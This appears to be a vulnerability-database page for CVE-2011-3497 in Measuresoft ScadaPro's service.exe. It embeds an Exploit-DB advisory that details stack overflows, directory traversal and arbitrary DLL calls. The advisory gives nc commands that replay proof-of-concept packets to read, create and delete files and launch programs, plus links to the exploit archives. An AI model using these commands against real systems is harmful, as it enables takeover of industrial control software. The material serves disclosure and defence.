CVE-2011-3497

critical
Published 2011-09-16 · Modified 2026-04-29
CVSS v3
—
CVSS v4
—
not yet in upstream
VIR risk
10.0

Description

service.exe in Measuresoft ScadaPro 4.0.0 and earlier allows remote attackers to execute arbitrary DLL functions via the XF function, possibly related to an insecure exposed method.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-17844 dos windows text · 5 KB
Luigi Auriemma · 2011-09-14

Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities

text exploit Source: Exploit-DB
#######################################################################

                             Luigi Auriemma

Application:  Measuresoft ScadaPro
              http://www.measuresoft.com/products/scada-products.aspx
Versions:     <= 4.0.0
Platforms:    Windows
Bugs:         arbitrary commands execution
              directory traversal in read, write and delete mode
              tons of stack overflow vulnerabilities
              various Denial of Service vulnerabilities
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"ScadaPro is Real Time Data Acquisition software for Microsoft Windows.
Optimised to use the powerful real time, multi-tasking features of
Windows, ScadaPro provides integrated data acquisition, monitoring,
data logging, mimic development and report generation."


#######################################################################

=======
2) Bugs
=======


service.exe is a service listening on port 11234.

Initially I started testing this software as usual by checking all the
operations performed by the various opcodes. The opcodes are divided
into groups: the second byte of the packet identifies the group, while
the first byte is the opcode for the final operation.
The function that handles the various groups and opcodes is located at
offset 004061F0.

The problem is that there are so many security vulnerabilities and
design problems in this service that continuing the tests is not
worthwhile, so after checking the opcodes of the 'F' group and doing a
quick scan of the others I stopped testing to avoid wasting more time.
This means there are certainly other vulnerabilities, but the most
important ones (stack overflows, code execution and file access) have
been covered in the 'F' group, and the main stack overflows of all the
groups can be caught with the simple scanner linked in the next section.

In short, there are stack overflow vulnerabilities in almost all the
supported commands; they come from sscanf calls and in-line strcpy
loops like the following, taken from the "TF" command:

  0040A0D9   . 8D5424 38      LEA EDX,DWORD PTR SS:[ESP+38]
  0040A0DD   . 52             PUSH EDX
  0040A0DE   . 68 84D46700    PUSH service.0067D484     ; "%s"
  0040A0E3   . 57             PUSH EDI
  0040A0E4   . E8 12F20000    CALL service.004192FB     ; sscanf
  ...
  0040A114   > 8D5424 20      LEA EDX,DWORD PTR SS:[ESP+20]
  0040A118   . 8BC7           MOV EAX,EDI
  0040A11A   . 2BD7           SUB EDX,EDI
  0040A11C   . 8D6424 00      LEA ESP,DWORD PTR SS:[ESP]
  0040A120   > 8A08           MOV CL,BYTE PTR DS:[EAX]
  0040A122   . 880C02         MOV BYTE PTR DS:[EDX+EAX],CL
  0040A125   . 83C0 01        ADD EAX,1
  0040A128   . 84C9           TEST CL,CL
  0040A12A   .^75 F4          JNZ SHORT service.0040A120

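The pattern in that listing, rendered in C as an added illustration (this is not code from ScadaPro or from the advisory's author): parse_tf_unsafe mirrors the unbounded sscanf("%s") into a stack buffer followed by the in-line byte-copy loop, and parse_tf_safe is a bounded replacement that rejects a token that does not fit instead of truncating it silently. The buffer size TOKEN_MAX and the function names are assumptions; the real frame layout of service.exe is not given on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed stack buffers; the real frame layout is not on
 * the page. */
#define TOKEN_MAX 32

/* Mirrors the listing: sscanf with an unbounded "%s" into a stack buffer,
 * then a byte-copy loop that stops only at NUL. An argument longer than
 * TOKEN_MAX-1 bytes overruns the frame. Kept here for comparison only; it
 * must never see untrusted input. */
void parse_tf_unsafe(const char *arg)
{
    char token[TOKEN_MAX];
    char copy[TOKEN_MAX];
    const char *s = token;
    char *d = copy;

    sscanf(arg, "%s", token);            /* no width limit */
    while ((*d++ = *s++) != '\0')        /* in-line strcpy */
        ;
    printf("parsed: %s\n", copy);
}

/* Bounded replacement: extracts the first whitespace-delimited token into
 * out[outlen] and refuses input that would not fit (no silent truncation).
 * Returns the token length, or -1 on empty or oversized input. */
int parse_tf_safe(const char *arg, char *out, size_t outlen)
{
    size_t n;

    if (arg == NULL || out == NULL || outlen == 0)
        return -1;
    arg += strspn(arg, " \t\r\n");        /* skip leading whitespace as %s does */
    n = strcspn(arg, " \t\r\n");          /* length of the first token */
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, arg, n);
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    char out[TOKEN_MAX];
    char oversized[4 * TOKEN_MAX];        /* constructed overlong argument */

    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    printf("short : %d\n", parse_tf_safe("tag42 extra", out, sizeof out));
    printf("long  : %d\n", parse_tf_safe(oversized, out, sizeof out));
    return 0;
}
```

The same fix applies to the sscanf call itself: a width specifier such as "%31s" for a 32-byte buffer bounds the copy, but an explicit length check as above also lets the caller reject the packet rather than process a truncated argument.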
Obviously there are many Denial of Service bugs too.

Then there is full control over the files to read and write, and the
possibility of directory traversal attacks, as in the "RF" and "wF"
commands (the first char is lowercase because there is a check that
blocks its use). Example of the tab-separated arguments:

  RF%
    filename
    ReadFile.nNumberOfBytesToRead
    SetFilePointer.lDistanceToMove
    SetFilePointer.dwMoveMethod
    CreateFile.dwDesiredAccess
    CreateFile.dwShareMode 
    ???
    CreateFile.dwCreationDisposition
    CreateFile.dwFlagsAndAttributes
    content if in write mode

It's also possible to delete files and whole folders (including their
files) via the "UF" and "NF" commands.

Then it's possible to pass custom arguments to the backup commands, as
happens with "BF", "OF" and "EF" while executing mszip, because the
arguments are not sanitized against injection of the '"' char.
The program also supports other backup programs like tar and compress.

And finally, through the "XF" command it's possible to execute an
arbitrary function of a DLL, for example "system" from msvcrt.dll, and
so run any desired command.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip

only a simple scanner:
  udpsz -d 2 -c "xx%"       -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test,"  -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000

http://aluigi.org/poc/scadapro_1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip

  nc SERVER 11234 < scadapro_1b.dat     ; read c:\boot.ini
  nc SERVER 11234 < scadapro_1c.dat     ; create c:\evil_file.txt
  nc SERVER 11234 < scadapro_1d.dat     ; delete c:\valid_file.txt
  nc SERVER 11234 < scadapro_1e.dat     ; execute notepad


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Metasploit modules

Measuresoft ScadaPro Remote Command Execution

Application impact

Vendor       Product   Versions                   Fixed
measuresoft  scadapro  {"endIncluding":"4.0.0"}
measuresoft  scadapro  2.1
measuresoft  scadapro  2.2
measuresoft  scadapro  2.3
measuresoft  scadapro  2.4
measuresoft  scadapro  2.4.1
measuresoft  scadapro  2.4.2
measuresoft  scadapro  2.4.3
measuresoft  scadapro  2.4.4
measuresoft  scadapro  2.4.5
measuresoft  scadapro  2.4.6
measuresoft  scadapro  2.5
measuresoft  scadapro  2.5.1
measuresoft  scadapro  2.5.2
measuresoft  scadapro  2.5.3
measuresoft  scadapro  2.5.4
measuresoft  scadapro  2.5.5
measuresoft  scadapro  2.6.0
measuresoft  scadapro  2.7.0
measuresoft  scadapro  2.7.1
measuresoft  scadapro  2.7.2
measuresoft  scadapro  2.8.0
measuresoft  scadapro  2.9.0
measuresoft  scadapro  3.1.0
measuresoft  scadapro  3.2.8
measuresoft  scadapro  3.2.9
measuresoft  scadapro  3.3.0
measuresoft  scadapro  3.3.1
measuresoft  scadapro  3.3.2
measuresoft  scadapro  3.9.0
measuresoft  scadapro  3.9.1
measuresoft  scadapro  3.9.2
measuresoft  scadapro  3.9.3
measuresoft  scadapro  3.9.4
measuresoft  scadapro  3.9.5
measuresoft  scadapro  3.9.6
measuresoft  scadapro  3.9.7
measuresoft  scadapro  3.9.8
measuresoft  scadapro  3.9.9
measuresoft  scadapro  3.9.10
measuresoft  scadapro  3.9.11
measuresoft  scadapro  3.9.12
measuresoft  scadapro  3.9.13
measuresoft  scadapro  3.9.14
measuresoft  scadapro  3.9.15

References

CWEs

CWE-200